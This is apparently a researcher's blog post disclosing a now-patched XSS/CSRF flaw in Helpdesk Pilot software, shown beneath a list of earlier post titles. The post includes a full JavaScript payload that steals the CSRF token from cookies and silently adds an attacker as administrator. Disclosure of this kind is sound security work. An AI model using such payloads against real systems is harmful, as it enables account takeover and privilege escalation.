College Graduation - 20 Nov 2014
Yahoo for the craic! - 21 Sep 2014
IRC what you did there... - 02 Aug 2014
Let me Bug you!? - 19 Jun 2014
Plesk 10 & 11 SSO XXE/XSS - 08 May 2014
Final Year Woes - 23 Apr 2014
SWMing in privilege, or drowning? - 10 Apr 2014
Lucid Surrealist Dreams and techno-lust. - 22 Mar 2014
New Raspberry piToy - 05 Feb 2014
Happy 2014! - 15 Jan 2014
Helpdesk Pilot Xss/CSRF Add an Admin - 30 Nov 2013
Squidoo.com $1,100 bug bounty - 01 Nov 2013
Yahoo Xss bug bounty - 01 Oct 2013
Moodle 2.0 Account Takeover - 04 Sep 2013
Xss Challenge Accepted - 17 Aug 2013
rpliy - rpi python web player - 25 Jul 2013
Busy times - 10 Jul 2013
Source Conference - 27 May 2013
Coinbase.com bug bounty - 04 May 2013
Xssive, Moodle and CSRF - 11 Apr 2013
Spoofing facebook content - 31 Mar 2013
Yahoo Pipes is Great! - 04 Mar 2013
Science Hack-day Dublin - 03 Mar 2013
Simple port scan - 26 Feb 2013
4chan-tool.py - 19 Feb 2013
Wix.com Xss - 11 Feb 2013
Crawl.py Url Crawling - 08 Feb 2013
Xssive Demo tool - 12 Jan 2013
Cyberbullying? - 27 Dec 2012
Merry XssMas - 24 Dec 2012
Watching BBC Streams - 10 Dec 2012
SWF Disassembly - 25 Nov 2012
C <3 - 16 Nov 2012
Greasemonkey XSS 2 - 21 Oct 2012
Work Logging App - 20 Oct 2012
Greasemonkey XSS - 29 Sep 2012
Guestbook XSS - 18 Sep 2012
OWASP Vicnum Project - 05 Sep 2012
August... - 05 Sep 2012
XSS Scenarios. - 30 Jul 2012
Imageroll - 05 Jul 2012
The Dangers of XSS - 14 Jun 2012
Facebook Canvas Graph - 08 Jun 2012
US Threat Gauge - 30 May 2012
Is this art? - 28 May 2012
Rss2Irc - 24 May 2012
Blackboard Xss Jungle - 14 May 2012
Url Info Scraper - 10 May 2012
pythonchallenge.com - 27 Apr 2012
Prime Generator - 15 Apr 2012
Sockso 1.51 Xss - 07 Apr 2012
Facebook Images - 03 Apr 2012
Google Hacking - 31 Mar 2012
Ubuntu 10.10 Hardening - 18 Mar 2012
2nd Year Revisited - 17 Mar 2012

Helpdesk Pilot Xss/CSRF Add an Admin

This bug allows a malicious party add themselves as a helpdesk Administrator via a crafted Xss/CSRF combination. It effects all versions of the Helpdesk Pilot software. I have received confirmation that this bug has been patched in the latest version of this software from the developers.There is a video demonstration of this attack below.

The attacker submits a ticket containing a malicious Url which results in javascript execution. If our administrator views this ticket, via cross site request forgery, he/she adds our attacker as an admin. It is also possible to craft this attack should a regular Staff account open our ticket.

The bug is a result of incorrect escaping on a Url. For a simple proof of concept you can use the following http://makthepla.net/<script>alert(1);</script> This will demonstrate that javascript execution is possible through submitting a ticket.

For a more malicious demonstration as shown in the video, an admin could be added using a Url of the following.

http://makthepla.net/Add_admin_poc/<script>$(document).ready(function(){$.ajax({type: /"POST",url:"http://poc.helpdeskpilot.net/staff/manage/staff/",data:"csrfmiddlewaretoken="+document.cookie.split('=')[1]+"&formtype=invite_staff&staff&first_name&last_name&email=ATTACKER@MAIL.COM&bulk_emails&role=1&categories=1",success:function(data){alert("Admin-Added-POC");},error:function(data){alert("POC_FAILED");}})});</script>

This submits a form that would add an administrator assuming the person viewing the ticket has administrator permissions.